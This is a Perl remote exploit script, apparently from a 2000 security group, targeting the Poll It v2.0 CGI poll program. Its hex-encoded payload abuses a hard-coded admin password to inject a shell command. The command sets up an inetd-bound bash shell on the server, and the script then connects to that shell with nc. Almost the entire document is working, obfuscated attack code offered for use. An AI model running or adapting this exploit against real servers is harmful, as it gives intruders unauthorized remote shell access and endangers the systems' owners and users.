#!/usr/bin/perl # | Remote exploit for Poll It v2.0 CGI / CGI-World.Com # | Copyright (c) 2000 by # | All rights reserved. # | # | http://www.digit-labs.org/ || digit-labs use Socket; @char = qw(/ - \ \ |); if (!($ARGV[0])) { die("Usage: $0 \n"); } $target = $ARGV[0]; $evilcode = # Poll It v2.0 CGI portbinding c0de (TM) "\x61\x64\x6d\x69\x6e\x5f\x70\x61\x73\x73\x77\x6f\x72". "\x64\x3d\x68\x61\x73\x73\x26\x65\x6e\x74\x65\x72\x65". "\x64\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x3d\x68\x61". "\x73\x73\x26\x61\x63\x74\x69\x6f\x6e\x3d\x61\x64\x64". "\x5f\x6f\x70\x74\x69\x6f\x6e\x26\x61\x64\x64\x5f\x6f". "\x70\x74\x69\x6f\x6e\x3d\x31\x26\x70\x6f\x6c\x6c\x5f". "\x6f\x70\x74\x69\x6f\x6e\x73\x3d\x65\x63\x68\x6f\x2b". "\x27\x66\x69\x64\x6f\x2b\x73\x74\x72\x65\x61\x6d\x2b". "\x74\x63\x70\x2b\x6e\x6f\x77\x61\x69\x74\x2b\x6e\x6f". "\x62\x6f\x64\x79\x2b\x2f\x62\x69\x6e\x2f\x62\x61\x73". "\x68\x2b\x62\x61\x73\x68\x2b\x2d\x69\x27\x2b\x3e\x2b". "\x2f\x74\x6d\x70\x2f\x2e\x68\x61\x73\x73\x3b\x2f\x75". "\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e\x65\x74\x64". "\x2b\x2f\x74\x6d\x70\x2f\x2e\x68\x61\x73\x73\x7c"; $exploit = "GET /cgi-bin/poll.cgi?$evilcode HTTP/1.1 Host: $target Referer: http://teleh0r.cjb.net/ User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95) Accept: */* Accept-Language: en Accept-Encoding: gzip, deflate, compress, identity Content-Type: application/x-www-form-urlencoded"; print("** Sending evil GET command to $target now ...\n"); $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$exploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); print("** Waiting to connect $target:fido (delay): "); while ($i < '200') { foreach $one (@char) { print("\b$one"); system("usleep 99"); } $i++; } print("\n\n"); system("(echo -e \"uname -mnrsp;w\n\"; cat) | nc $target 60179");